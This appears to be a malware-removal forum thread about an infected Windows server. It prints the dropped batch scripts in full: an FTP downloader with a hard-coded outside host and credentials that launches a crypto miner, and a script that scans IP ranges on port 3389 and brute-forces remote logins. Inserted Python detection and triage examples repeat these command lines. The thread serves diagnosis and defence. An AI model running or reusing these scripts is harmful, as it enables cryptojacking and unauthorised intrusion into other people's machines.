 Version:      Previous Signature Version: 1.165.3804.0     Update Source: %%849     Update Stage:
 %%852     Source Path:
 AUTHORITY\SYSTEM     Current Engine Version:      Previous Engine Version: 1.1.10201.0     Error
 code: 0x8024402c     Error description: An unexpected problem occurred while checking
 for updates. For information on installing or troubleshooting updates, see Help
 and Support.
 
Error - 2/11/2014 8:18:28 PM | Computer Name = COMPANY-HV.COMPANY.local | Source = Service Control Manager | ID = 7011
Description = A timeout (30000 milliseconds) was reached while waiting for a transaction
 response from the NlaSvc service.
 
Error - 2/11/2014 9:25:10 PM | Computer Name = COMPANY-HV.COMPANY.local | Source = Microsoft Antimalware | ID = 2001
Description = %%860 has encountered an error trying to update signatures.     New Signature
 Version:      Previous Signature Version: 1.165.3833.0     Update Source: %%849     Update Stage:
 %%852     Source Path:
 AUTHORITY\SYSTEM     Current Engine Version:      Previous Engine Version: 1.1.10201.0     Error
 code: 0x8024402c     Error description: An unexpected problem occurred while checking
 for updates. For information on installing or troubleshooting updates, see Help
 and Support.
 
Error - 2/11/2014 9:29:23 PM | Computer Name = COMPANY-HV.COMPANY.local | Source = Service Control Manager | ID = 7011
Description = A timeout (30000 milliseconds) was reached while waiting for a transaction
 response from the NlaSvc service.
 
Error - 2/11/2014 9:52:31 PM | Computer Name = COMPANY-HV.COMPANY.local | Source = Microsoft Antimalware | ID = 2001
Description = %%860 has encountered an error trying to update signatures.     New Signature
 Version:      Previous Signature Version: 1.165.3843.0     Update Source: %%849     Update Stage:
 %%852     Source Path:
 AUTHORITY\SYSTEM     Current Engine Version:      Previous Engine Version: 1.1.10201.0     Error
 code: 0x8024402c     Error description: An unexpected problem occurred while checking
 for updates. For information on installing or troubleshooting updates, see Help
 and Support.
 
Error - 2/12/2014 5:52:32 AM | Computer Name = COMPANY-HV.COMPANY.local | Source = Microsoft Antimalware | ID = 2001
Description = %%860 has encountered an error trying to update signatures.     New Signature
 Version:      Previous Signature Version: 1.165.3843.0     Update Source: %%849     Update Stage:
 %%852     Source Path:
 AUTHORITY\SYSTEM     Current Engine Version:      Previous Engine Version: 1.1.10201.0     Error
 code: 0x8024402c     Error description: An unexpected problem occurred while checking
 for updates. For information on installing or troubleshooting updates, see Help
 and Support.
 
Error - 2/12/2014 9:28:42 AM | Computer Name = COMPANY-HV.COMPANY.local | Source = Service Control Manager | ID = 7011
Description = A timeout (30000 milliseconds) was reached while waiting for a transaction
 response from the UmRdpService service.
 
Error - 2/12/2014 9:45:49 AM | Computer Name = COMPANY-HV.COMPANY.local | Source = UmrdpService | ID = 1111
Description = Driver Microsoft XPS Document Writer v4 required for printer Microsoft
 XPS Document Writer is unknown. Contact the administrator to install the driver
 before you log in again.
 
 
< End of report >
 


  • Root Admin

Okay, well, right off the bat I see a lot of CMD files, which are basically batch files, located here:

C:\Windows\SysWow64\tmp62.cmd

C:\Windows\SysWow64\tmp61.cmd

C:\Windows\SysWow64\tmp59.cmd

There are many more listed. Please find and open a couple of them with NOTEPAD and see what they say and what they're doing and let me know. If possible please post the content from one of them here as well.

You also have a firewall setting for at least one application that does not even seem to be known to Google

========== Vista Active Application Exception List ==========

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules]

"{16E8CF16-C14B-46FD-A69D-48BBCEAEF1CC}" = dir=in | app=%systemroot%\mtc\mtc_minerd32.exe |

"{17F45A38-1DA1-416D-AD62-5FA9B9E89800}" = dir=in | app=%systemroot%\xpm\xpm_minerd32.exe |

"{2BDCC1FF-583A-4889-9217-368DFE7FD7DF}" = dir=in | app=%systemroot%\pts\pts_minerd.exe |

"{4BA5D8AA-E41E-476D-86A2-D37F55373783}" = dir=out | app=%systemroot%\pts\pts_minerd32.exe |

"{5CA8A5F9-B39E-45B3-80E1-CEE3C2979218}" = dir=in | app=%systemroot%\tanechka\realvnc.exe |

"{75A08EE6-03EA-4B12-A3D0-48081187B980}" = dir=in | app=%systemroot%\xpm\xpm_minerd.exe |

"{93D58FB7-CBBC-4869-B15A-C01CA6293474}" = dir=out | app=%systemroot%\xpm\xpm_minerd32.exe |

"{A49A6938-87B8-4832-96E8-F3B585E59502}" = dir=out | app=%systemroot%\mtc\mtc_minerd32.exe |

"{BD32485C-F3A8-4AA5-8CD2-5D36318E93A5}" = dir=out | app=%systemroot%\pts\pts_minerd.exe |

"{BD65746C-07B8-4D6C-BD9C-B54E0BA8EC04}" = dir=in | app=%systemroot%\pts\pts_minerd32.exe |

"{D5FF61DA-DAD1-4814-BA3D-19F6A57E6974}" = dir=out | app=%systemroot%\tanechka\realvnc.exe |

"{E2498AEA-ADD8-46F8-AA0B-036513D318CD}" = dir=in | app=%systemroot%\mtc\mtc_minerd.exe |

"{E5A2FBE6-D0F1-4AA6-8FDC-847CA10026A0}" = dir=out | app=%systemroot%\tanechka\svchosl.exe |

"{EC4365F0-A777-4BD5-9D9D-08A41F65ED36}" = dir=out | app=%systemroot%\mtc\mtc_minerd.exe |

"{F4FC679D-1A41-47E3-BEC3-9A28E9D4724A}" = dir=out | app=%systemroot%\xpm\xpm_minerd.exe |

"{F7BC4FD0-CB22-4D68-B55B-0C3867E651C2}" = dir=in | app=%systemroot%\tanechka\svchosl.exe |

What is this file: mtc_minerd.exe? Are all of those files and entries valid for you? Please double check all of them and, if not valid, then fix or remove them. If the files or folders in question are not valid then remove or move them as well and rename them so they cannot be used while you continue to investigate.

Check those GUID values out in the Registry and see what else they point to.

Let me know about that stuff and then we'll continue on from there.

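The triage the Root Admin asks for above (dropped .cmd files in a system folder, firewall rules for binaries nobody recognises) can be scripted against the OTL report itself. The following is an added example written for this thread; it is not OTL's code and was not posted by anyone in the thread. It assumes the OTL line formats shown in the logs above: the `[date | size | attrs | C] (company) -- path` entries of the "Files Created" section and the `"{GUID}" = key=value | ... |` entries of the FirewallRules key. The sample lines are constructed from the thread's own log format, and the Chrome rule with the all-zero GUID is invented purely as a benign control case.

```python
"""Triage OTL log lines for dropped scripts and firewall rules pointing at
odd %SystemRoot% subfolders (added example, not OTL's code)."""
from __future__ import annotations

import re
from collections import Counter
from dataclasses import dataclass

# Constructed sample input in OTL's own line format (paths taken from the
# logs in this thread); the Chrome rule with the all-zero GUID is invented
# here as a benign control case and does not come from the log.
SAMPLE_LOG = r'''
========== Files Created - No Company Name ==========

[2014/02/12 08:08:58 | 000,000,894 | ---- | C] () -- C:\Windows\SysWow64\tmp62.cmd
[2014/02/11 05:04:06 | 000,000,890 | ---- | C] () -- C:\Windows\SysWow64\tmp59.cmd
[2014/02/05 11:04:26 | 004,380,160 | ---- | C] () -- C:\Users\administrator.COMPANY\Desktop\RogueKillerX64.exe
[2014/01/20 15:16:02 | 000,001,945 | ---- | C] () -- C:\Windows\epplauncher.mif

========== Vista Active Application Exception List ==========

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules]
"{16E8CF16-C14B-46FD-A69D-48BBCEAEF1CC}" = dir=in | app=%systemroot%\mtc\mtc_minerd32.exe |
"{5CA8A5F9-B39E-45B3-80E1-CEE3C2979218}" = dir=in | app=%systemroot%\tanechka\realvnc.exe |
"{F7BC4FD0-CB22-4D68-B55B-0C3867E651C2}" = dir=in | app=%systemroot%\tanechka\svchosl.exe |
"{00000000-0000-0000-0000-000000000001}" = dir=in | app=C:\Program Files (x86)\Google\Chrome\Application\chrome.exe |
'''

# One OTL "Files Created/Modified" entry: [ts | size | attrs | C or M] (company) -- path
FILE_RE = re.compile(
    r"^\[(?P<ts>\d{4}/\d{2}/\d{2} \d{2}:\d{2}:\d{2}) \| (?P<size>[\d,]+) \| "
    r"(?P<attr>\S+) \| (?P<op>[MC])\] \((?P<company>[^)]*)\) -- (?P<path>.+?)\s*$"
)
# One FirewallRules registry value: "{GUID}" = key=value | key=value | ... |
RULE_RE = re.compile(r'^"(?P<guid>\{[0-9A-Fa-f-]+\})" = (?P<body>.*)$')

SCRIPT_EXTS = {"cmd", "bat", "vbs", "js", "ps1"}
# Folders directly under %SystemRoot% where Windows itself keeps executables;
# an app path in any other folder directly under C:\Windows deserves a look.
STANDARD_WINDIR_SUBDIRS = {"system32", "syswow64", "sysnative", "winsxs", "microsoft.net"}


@dataclass(frozen=True)
class Finding:
    kind: str    # "file" or "firewall-rule"
    path: str    # path exactly as it appears in the log
    reason: str


def normalize_path(path: str) -> list[str]:
    """Expand %SystemRoot%/%windir%, lower-case, and split into components."""
    expanded = re.sub(r"%(systemroot|windir)%", lambda _m: r"C:\Windows", path, flags=re.I)
    return [p for p in expanded.lower().split("\\") if p]


def under_windir(parts: list[str]) -> bool:
    return parts[:2] == ["c:", "windows"]


def parse_firewall_rule(body: str) -> dict[str, str]:
    """Turn 'dir=in | app=... |' into {'dir': 'in', 'app': '...'}."""
    fields: dict[str, str] = {}
    for chunk in body.split("|"):
        chunk = chunk.strip()
        if "=" in chunk:
            key, value = chunk.split("=", 1)
            fields[key.strip().lower()] = value.strip()
    return fields


def triage(log_text: str) -> list[Finding]:
    findings: list[Finding] = []
    for line in log_text.splitlines():
        line = line.strip()
        m = FILE_RE.match(line)
        if m:
            parts = normalize_path(m.group("path"))
            name = parts[-1]
            ext = name.rsplit(".", 1)[-1] if "." in name else ""
            if under_windir(parts) and ext in SCRIPT_EXTS:
                findings.append(Finding("file", m.group("path"),
                                        f".{ext} script created under %SystemRoot% on {m.group('ts')}"))
            continue
        m = RULE_RE.match(line)
        if m:
            fields = parse_firewall_rule(m.group("body"))
            app = fields.get("app")
            if not app:
                continue  # port rule without an app path (e.g. the rdp rule)
            parts = normalize_path(app)
            if under_windir(parts) and len(parts) >= 4 and parts[2] not in STANDARD_WINDIR_SUBDIRS:
                findings.append(Finding("firewall-rule", app,
                                        f"rule {m.group('guid')} (dir={fields.get('dir', '?')}) "
                                        f"targets non-standard %SystemRoot% folder '{parts[2]}'"))
    return findings


def recurring_script_dirs(findings: list[Finding]) -> dict[str, int]:
    """Count flagged scripts per folder: several drops into one folder over
    several days points at something re-creating them, not a one-off."""
    counts: Counter[str] = Counter()
    for f in findings:
        if f.kind == "file":
            counts["\\".join(normalize_path(f.path)[:-1])] += 1
    return dict(counts)


if __name__ == "__main__":
    results = triage(SAMPLE_LOG)
    for f in results:
        print(f"{f.kind:14} {f.path} -> {f.reason}")
    print(recurring_script_dirs(results))
```

On the sample above this flags the two tmp*.cmd drops in SysWow64 and the three rules pointing into the mtc\ and tanechka\ folders, and leaves RogueKillerX64.exe, epplauncher.mif and the Chrome rule alone; the per-folder count is the cheap way to see that the same folder keeps receiving fresh scripts, which is the recurrence the thread is chasing.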

Those firewall entries were made by me to cripple the malware's ability to do... whatever. Mostly flood the network. They're all Blocks. mtc_minerd.exe (and similar files) seems to be some sort of BitCoin miner.

I have now renamed all folders involved.

 

Contents of tmp1.cmd

%windir%\tanechka\rdbrute.cmd -us

 

Contents of tmp5.cmd

echo off

set f_stop=0

set host=q968787.homenet.org
rem set host=q968787.ignorelist.com
rem set host=q968787.mooo.com
set user=ftpadmin
set passwd=mPhew8Hw

set project=ric
set bindir=%windir%\%project%
set minexe=%project%_minerd.exe
set minexe32=%project%_minerd32.exe

mkdir %bindir%
cd %bindir%

taskkill /F /IM ftp.exe
taskkill /F /IM %minexe%
taskkill /F /IM %minexe32%

echo open %host% > ftp.log
echo quote USER %user% >> ftp.log
echo quote PASS %passwd% >> ftp.log
echo cd %project% >> ftp.log
echo get files.txt >> ftp.log
echo bye >> ftp.log
ftp.exe -i -n -s:ftp.log
del ftp.log

echo open %host% > ftp.log
echo quote USER %user% >> ftp.log
echo quote PASS %passwd% >> ftp.log
echo cd %project% >> ftp.log

for /F "eol= tokens=1,2 delims=; " %%i in (files.txt) do (
   call :getfile %%i %%j
)

echo bye >> ftp.log
ftp.exe -i -n -s:ftp.log
del ftp.log

if %f_stop%==1 goto :exit

start /low %minexe% -o ypool.net -u q968787.%project%_1 -p x

tasklist | findstr %minexe% >tasklist.tmp
for /F "eol=| tokens=1,2 delims==" %%i in (tasklist.tmp) do (
   goto :exit
)

start /low %minexe32% -o ypool.net -u q968787.%project%_1 -p x

:exit
del %0
exit

:getfile
if exist %1 (
   call :check %1 %2
) else (
   echo get %1 >> ftp.log
)
exit /b

:check
if %~z1 neq %2 (
   echo get %1 >> ftp.log
)
exit /b

 

Contents of tmp5.cmd

%windir%\tanechka\rdbrute.cmd -clear

 

All other batch files have similar contents.

 

Contents of rdbrute.cmd

c:
set outdir=c:\windows\tanechka\
cd %outdir%

set f_clear=0
set f_test=0
for %%i in (%*) do if /i "%%i"=="-clear" set f_clear=1
for %%i in (%*) do if /i "%%i"=="-test" set f_test=1

set country="undef"
if %country%=="undef" for %%i in (%*) do if /i "%%i"=="-us" set country="us"
if %country%=="undef" for %%i in (%*) do if /i "%%i"=="-europe" set country="europe"
if %country%=="undef" for %%i in (%*) do if /i "%%i"=="-asia" set country="asia"
if %country%=="undef" for %%i in (%*) do if /i "%%i"=="-america" set country="america"

set scan_exe=realvnc.exe
set brute_exe=svchosl.exe

set ranges=ranges.txt

set source=source.txt
set users=users2.txt
set passwd=passwd2.txt
set ips=result_ip.txt

if %country%=="us" (
   set ranges=ranges_us.txt
) else if %country%=="europe" (
   set ranges=ranges_europe.txt
) else if %country%=="asia" (
   set ranges=ranges_asia.txt
) else if %country%=="america" (
   set ranges=ranges_america.txt
)

del break.status
if %f_clear%==1 goto :clear

taskkill /F /IM %brute_exe%
for /F "eol=| tokens=1,2 delims==" %%i in (config.ini) do (
   if %%i==Running (
      if %%j==1 (
         goto :start_brute
      )
   )
)

tasklist | findstr %scan_exe% >tasklist.tmp
for /F "eol=| tokens=1,2 delims==" %%i in (tasklist.tmp) do (
   goto :exit
)

:start_genranges
:: shuffle the intervals
if %f_test%==1 (
   echo 24.0.0.0-24.0.255.255 > scan_ranges.txt
   echo 24.1.0.0-24.1.255.255 >> scan_ranges.txt
   echo 24.2.0.0-24.2.255.255 >> scan_ranges.txt
   goto :start_scan
)
:: get random ranges
random.exe %ranges%
for /f %%n in ( 'more ^< "%ranges%.random" ^| find /c /v ""' ) do (
   set lines_count=%%n
)
set /a lines_count-=100
:: print the last n lines of the file
more +%lines_count% "%ranges%.random" > scan_ranges.txt

:start_scan
for /F "eol=¦ tokens=1 delims=" %%i in (scan_ranges.txt) do (
   if exist break.status goto :exit
   start %scan_exe% -i %%i -p 3389 -cT -T 2900
   sleep 300
)
if %f_test%==0 sleep 2400

taskkill /F /IM %scan_exe%

findstr /c:":3389" VNC_bypauth.txt > vnc1.tmp
for /F "eol=¹ tokens=1 delims=: " %%i in (vnc1.tmp) do echo %%i >> %ips%
del vnc1.tmp
del VNC_bypauth.txt
del scan_ranges.txt

:make_source
taskkill /F /IM %brute_exe%

del config.ini
echo Source=%source% >>config.ini
echo Bad=bad.txt >>config.ini
echo Good=good.txt >>config.ini
echo Error=error.txt >>config.ini
echo Thread=200 >>config.ini
echo TryConnect=2 >>config.ini
echo TimeOut=20.000000 >>config.ini
echo AutoSave=1.000000 >>config.ini
echo Restore=1 >>config.ini
echo Running=1 >>config.ini

del %source%
echo [Login]>>%source%
for /F "eol=¦ tokens=1 delims=" %%i in (%users%) do @echo %%i>>%source%

echo [Password]>>%source%
for /F "eol=¦ tokens=1 delims=" %%i in (%passwd%) do @echo %%i>>%source%

echo [iP]>>%source%
for /F "eol=¦ tokens=1 delims=" %%i in (%ips%) do @echo %%i-0>>%source%
del %ips%

:start_brute
start %brute_exe%
goto :exit

:clear
echo break > break.status
taskkill /F /IM %scan_exe%
taskkill /F /IM %brute_exe%

del VNC_bypauth.txt
del config.ini
del scan_ranges.txt

del bad.txt
del error.txt

:exit


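Detection logic for the behaviour these batch files show, added here as an example (it is not code from the thread, from Malwarebytes or from any vendor). It runs a few regex rules over process-creation records, the kind an EDR or Sysmon would log, and flags the four patterns the scripts rely on: ftp.exe driven by a script file (-s:), a *_minerd*.exe launched with pool and worker arguments, a sweep of an IP range against port 3389, and a .cmd file executed from under the Windows directory. The sample events are constructed to mirror the command lines in tmp5.cmd and rdbrute.cmd; they are not telemetry from the affected server.

```python
"""Detection heuristics for the dropper and scanner behaviour shown in the
batch files above. Added example; not code from the thread or from any
vendor. Sample events are constructed to mirror the command lines in
tmp5.cmd and rdbrute.cmd and are not real telemetry from the affected server.
"""
import re
from typing import Dict, List, NamedTuple


class ProcEvent(NamedTuple):
    """One process-creation record (parent image, child image, command line)."""
    parent: str
    image: str
    cmdline: str


# Each rule is a regex over the child's command line, tied to a line of the
# posted scripts:
#   ftp.exe -i -n -s:ftp.log                         -> scripted FTP transfer
#   start /low %minexe% -o ypool.net -u ... -p x      -> miner with pool/worker args
#   start %scan_exe% -i <range> -p 3389 ...           -> port-3389 sweep over a range
#   %windir%\tanechka\rdbrute.cmd, SysWOW64\tmpNN.cmd -> batch files under the Windows dir
RULES: Dict[str, "re.Pattern[str]"] = {
    "ftp_scripted_transfer": re.compile(r"(?i)\bftp(\.exe)?\b.*\s-s:\S+"),
    "miner_pool_args": re.compile(r"(?i)\S+_minerd(32)?\.exe.*\s-o\s+\S+\s+-u\s+\S+"),
    "port_scan_3389_range": re.compile(
        r"(?i)\s-i\s+\d{1,3}(\.\d{1,3}){3}-\d{1,3}(\.\d{1,3}){3}\s+-p\s+3389\b"),
    "batch_under_windir": re.compile(r"(?i)\b[a-z]:\\windows\\\S*\.cmd\b"),
}


def triage(events: List[ProcEvent]) -> Dict[str, List[str]]:
    """Map each rule name to the command lines that matched it.

    A rule key is present only when it fired, so an empty dict means nothing
    in the batch of events looked like the posted scripts.
    """
    hits: Dict[str, List[str]] = {}
    for ev in events:
        for name, rx in RULES.items():
            if rx.search(ev.cmdline):
                hits.setdefault(name, []).append(ev.cmdline)
    return hits


# Constructed sample: four events modelled on the scripts, plus two benign ones.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\SysWOW64\cmd.exe", r"C:\Windows\SysWOW64\ftp.exe",
              "ftp.exe -i -n -s:ftp.log"),
    ProcEvent(r"C:\Windows\SysWOW64\cmd.exe", r"C:\Windows\ric\ric_minerd.exe",
              "ric_minerd.exe -o ypool.net -u q968787.ric_1 -p x"),
    ProcEvent(r"C:\Windows\SysWOW64\cmd.exe", r"C:\Windows\tanechka\realvnc.exe",
              "realvnc.exe -i 24.0.0.0-24.0.255.255 -p 3389 -cT -T 2900"),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\SysWOW64\cmd.exe",
              r"cmd.exe /c C:\Windows\SysWOW64\tmp24.cmd"),
    # Benign: an interactive ftp session and a normal service host.
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\ftp.exe",
              "ftp.exe ftp.example.com"),
    ProcEvent(r"C:\Windows\System32\services.exe", r"C:\Windows\System32\svchost.exe",
              "svchost.exe -k netsvcs"),
]


if __name__ == "__main__":
    for rule, lines in triage(SAMPLE_EVENTS).items():
        for cmd in lines:
            print(f"{rule:24s} {cmd}")
```

The rules key on arguments rather than file names on purpose: the scripts rename their payloads per project (ric_, pts_, mtc_) and drop the batch files under fresh tmpNN.cmd names, but the ftp.exe -s: invocation, the -o/-u pool arguments and the -p 3389 sweep stay constant across those copies, which makes them the stable thing to alert on.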
  • Root Admin

So why are you using so many batch files?  Wouldn't one do what you're wanting to do?

 

Please download Farbar Recovery Scan Tool and save it to your desktop.

Note: You need to run the version compatible with your system. If you are not sure which version applies to your system download both of them and try to run them. Only one of them will run on your system; that will be the right version.

  • Double-click to run it. When the tool opens click Yes to disclaimer.
  • Press Scan button.
  • It will make a log (FRST.txt) in the same directory the tool is run. Please copy and paste it to your reply.
  • The first time the tool is run, it makes also another log (Addition.txt). Please attach it to your reply.


 


I didn't create those batch files... malware did...

 

FRST Log:

 

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 18-02-2014
Ran by Administrator (administrator) on COMPANY-HV on 19-02-2014 09:36:04
Running from C:\Users\administrator.COMPANY\Desktop
Windows Server 2008 R2 Standard Service Pack 1 (X64) OS Language: English(US)
Internet Explorer Version 10
Boot Mode: Normal

The only official download link for FRST:
Download link for 32-Bit version: http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/81/
Download link for 64-Bit Version: http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/82/
Download link from any site other than Bleeping Computer is unpermitted or outdated.
See tutorial for FRST: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(Microsoft Corporation) C:\Program Files\Microsoft Security Client\Antimalware\MsMpEng.exe
(Microsoft Corporation) C:\Windows\system32\LogonUI.exe
(Hewlett-Packard Company) C:\Program Files\HP\Cissesrv\cissesrv.exe
(Hewlett-Packard Company) C:\Windows\system32\cpqrcmc.exe
(Hewlett-Packard Company) C:\hp\hpsmh\data\cgi-bin\vcagent\vcagent.exe
(Microsoft Corp.) C:\Program Files\System Center Operations Manager\Gateway\HealthService.exe
() C:\Windows\system32\sclient.exe
(Microsoft Corporation) C:\Windows\System32\snmp.exe
(Hewlett-Packard Company) C:\Windows\system32\sysdown.exe
(Hewlett-Packard Company) C:\hp\hpsmh\bin\smhstart.exe
(Hewlett-Packard Company) C:\Windows\system32\CPQNiMgt\cpqnimgt.exe
(Hewlett-Packard Company) C:\Windows\system32\CpqMgmt\cqmgserv\cqmgserv.exe
(Hewlett-Packard Company) C:\Windows\system32\CpqMgmt\cqmgstor\cqmgstor.exe
(Microsoft Corporation) C:\Windows\system32\vmms.exe
(Hewlett-Packard Company) C:\hp\hpsmh\bin\hpsmhd.exe
(Hewlett-Packard Company) C:\Windows\system32\CpqMgmt\cqmghost\cqmghost.exe
(Hewlett-Packard Company) C:\hp\hpsmh\bin\rotatelogs.exe
(Hewlett-Packard Company) C:\hp\hpsmh\bin\rotatelogs.exe
(Hewlett-Packard Company) C:\hp\hpsmh\bin\hpsmhd.exe
(Hewlett-Packard Company) C:\hp\hpsmh\bin\rotatelogs.exe
(Hewlett-Packard Company) C:\hp\hpsmh\bin\rotatelogs.exe
(Hewlett-Packard Company) C:\hp\hpsmh\bin\rotatelogs.exe
(Microsoft Corporation) C:\Windows\System32\vmwp.exe
(Microsoft Corp.) C:\Program Files\System Center Operations Manager\Gateway\MonitoringHost.exe
(Microsoft Corp.) C:\Program Files\System Center Operations Manager\Gateway\MonitoringHost.exe
(Microsoft Corporation) C:\Windows\System32\vmwp.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\Antimalware\NisSrv.exe
(Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe
(Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe
(Microsoft Corporation) C:\Windows\SysWOW64\ftp.exe
(Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe
(Microsoft Corporation) C:\Windows\SysWOW64\ftp.exe
(Microsoft Corporation) C:\Windows\System32\rdpclip.exe
(Hewlett-Packard Company) C:\Program Files\HP\NCU\cpqteam.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe
(Microsoft Corp.) C:\Program Files\System Center Operations Manager\Gateway\MonitoringHost.exe


==================== Registry (Whitelisted) ==================

HKLM\...\Run: [CPQTEAM] - C:\Program Files\HP\NCU\cpqteam.exe [73728 2010-04-27] (Hewlett-Packard Company)
HKLM\...\Run: [MSC] - C:\Program Files\Microsoft Security Client\msseces.exe [1436224 2010-11-30] (Microsoft Corporation)
Winlogon\Notify\AtiExtEvent: Ati2evxx.dll [X]
HKLM\...\Policies\Explorer: [showSuperHidden] 1
HKLM\...\Policies\Explorer: [NoWelcomeScreen] 1
Lsa: [Notification Packages] scecli rassfm

==================== Internet (Whitelisted) ====================


HKCU\Software\Microsoft\Internet Explorer\Main,Secondary Start Pages =
DPF: HKLM-x32 {82774781-8F4E-11D1-AB1C-0000F8773BF0} https://transfers.ds.microsoft.com/FTM/TransferSource/grTransferCtrl.cab
Handler: hpapp\Apps - No CLSID Value -
Handler-x32: hpapp\Apps - No CLSID Value -
Hosts: 188.122.70.10         scom01.asapnet.local
Tcpip\..\Interfaces\{C7B52165-FFD6-4475-A339-E29F9F34975A}: [NameServer]192.168.10.11,8.8.8.8

==================== Services (Whitelisted) =================

S4 AdtAgent; C:\Windows\system32\AdtAgent.exe [407176 2012-10-30] (Microsoft Corporation)
S4 CIMnotify; C:\Windows\system32\CIMntfy\cimntfy.exe [268392 2010-05-26] (Hewlett-Packard Company)
R2 Cissesrv; C:\Program Files\HP\Cissesrv\cissesrv.exe [167424 2010-03-19] (Hewlett-Packard Company)
R2 CpqNicMgmt; C:\Windows\system32\CPQNiMgt\cpqnimgt.exe [9728 2010-04-28] (Hewlett-Packard Company)
R2 CpqRcmc; C:\Windows\system32\cpqrcmc.exe [22568 2008-11-14] (Hewlett-Packard Company)
R2 cpqvcagent; C:\hp\hpsmh\data\cgi-bin\vcagent\vcagent.exe [1307648 2010-03-25] (Hewlett-Packard Company)
R2 CqMgHost; C:\Windows\system32\CpqMgmt\cqmghost\cqmghost.exe [15464 2010-05-26] (Hewlett-Packard Company)
R2 CqMgServ; C:\Windows\system32\CpqMgmt\cqmgserv\cqmgserv.exe [15464 2010-05-26] (Hewlett-Packard Company)
R2 CqMgStor; C:\Windows\system32\CpqMgmt\cqmgstor\cqmgstor.exe [20992 2010-04-09] (Hewlett-Packard Company)
S3 FCRegSvc; C:\Windows\system32\FCRegSvc.dll [25600 2009-07-14] (Microsoft Corporation)
R2 HealthService; C:\Program Files\System Center Operations Manager\Gateway\HealthService.exe [25200 2012-10-30] (Microsoft Corp.)
R2 MsMpSvc; C:\Program Files\Microsoft Security Client\Antimalware\MsMpEng.exe [12784 2010-11-11] (Microsoft Corporation)
R3 NisSrv; C:\Program Files\Microsoft Security Client\Antimalware\NisSrv.exe [282616 2010-11-11] (Microsoft Corporation)
R2 nvspwmi; C:\Windows\system32\nvspwmi.dll [407040 2010-11-21] (Microsoft Corporation)
S3 RSoPProv; C:\Windows\system32\RSoPProv.exe [91648 2009-07-14] (Microsoft Corporation)
S3 sacsvr; C:\Windows\system32\sacsvr.dll [14848 2009-07-14] (Microsoft Corporation)
R2 sclient; C:\Windows\system32\sclient.exe [192512 2013-12-07] ()
R2 SNMP; C:\Windows\System32\snmp.exe [49664 2010-11-21] (Microsoft Corporation)
R2 SNMP; C:\Windows\SysWOW64\snmp.exe [47616 2010-11-21] (Microsoft Corporation)
R2 sysdown; C:\Windows\system32\sysdown.exe [17960 2010-01-25] (Hewlett-Packard Company)
R2 SysMgmtHp; C:\hp\hpsmh\bin\smhstart.exe [2041856 2010-01-28] (Hewlett-Packard Company)
S4 System Center Management APM; C:\Program Files\System Center Operations Manager\Gateway\APMDOTNETAgent\InterceptSvc.exe [633968 2012-10-30] (Microsoft Corp.)
R2 vhdsvc; C:\Windows\system32\vhdsvc.dll [193024 2010-11-21] (Microsoft Corporation)
R2 vmms; C:\Windows\system32\vmms.exe [4625408 2010-11-21] (Microsoft Corporation)

==================== Drivers (Whitelisted) ====================

R3 ati2mtag; C:\Windows\System32\DRIVERS\ati2mtag.sys [2210816 2009-06-24] (ATI Technologies Inc.)
R3 CpqCiDrv; C:\Windows\System32\DRIVERS\cpqcidrv.sys [51752 2009-05-11] (Hewlett-Packard Company)
S3 CPQTeam; C:\Windows\System32\DRIVERS\cpqteam.sys [225792 2010-02-24] (Hewlett-Packard Company)
R0 HpCISSs2; C:\Windows\System32\DRIVERS\HpCISSs2.sys [156776 2010-02-22] (Hewlett-Packard Company)
R0 hpqilo2; C:\Windows\System32\DRIVERS\hpqilo2.sys [160296 2010-01-25] (Hewlett-Packard Company)
R1 hvboot; C:\Windows\System32\drivers\hvboot.sys [119168 2010-11-21] (Microsoft Corporation)
S3 ioatdma; C:\Windows\System32\Drivers\qd260x64.sys [35328 2009-06-10] (Intel Corporation)
R1 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [188928 2010-10-24] (Microsoft Corporation)
R3 NisDrv; C:\Windows\System32\DRIVERS\NisDrvWFP.sys [72064 2010-10-24] (Microsoft Corporation)
R3 passthruparser; C:\Windows\System32\drivers\passthruparser.sys [20992 2010-11-21] (Microsoft Corporation)
R3 q57nd60a; C:\Windows\System32\DRIVERS\b57nd60a.sys [384040 2010-04-30] (Broadcom Corporation)
S0 sacdrv; C:\Windows\System32\DRIVERS\sacdrv.sys [96320 2009-07-14] (Microsoft Corporation)
R3 vhdparser; C:\Windows\System32\drivers\vhdparser.sys [17408 2010-11-21] (Microsoft Corporation)
R3 VMSMP; C:\Windows\System32\DRIVERS\vmswitch.sys [407552 2011-05-14] (Microsoft Corporation)
S3 VMSP; C:\Windows\System32\DRIVERS\vmswitch.sys [407552 2011-05-14] (Microsoft Corporation)

==================== NetSvcs (Whitelisted) ===================

NETSVC: sacsvr -> C:\Windows\system32\sacsvr.dll (Microsoft Corporation)

==================== One Month Created Files and Folders ========

2014-02-19 09:36 - 2014-02-19 09:36 - 00008460 _____ () C:\Users\administrator.COMPANY\Desktop\FRST.txt
2014-02-19 09:35 - 2014-02-19 09:35 - 02153472 _____ (Farbar) C:\Users\administrator.COMPANY\Desktop\FRST64.exe
2014-02-19 09:33 - 2014-02-19 09:36 - 00000000 ____D () C:\Users\administrator.COMPANY\AppData\Local\Temp\2
2014-02-18 19:55 - 2014-02-18 19:55 - 00000894 _____ () C:\Windows\SysWOW64\tmp24.cmd
2014-02-18 19:55 - 2014-02-18 19:55 - 00000000 ____D () C:\Windows\tanechka
2014-02-18 19:51 - 2014-02-18 19:51 - 00000034 _____ () C:\Windows\SysWOW64\tmp23.cmd
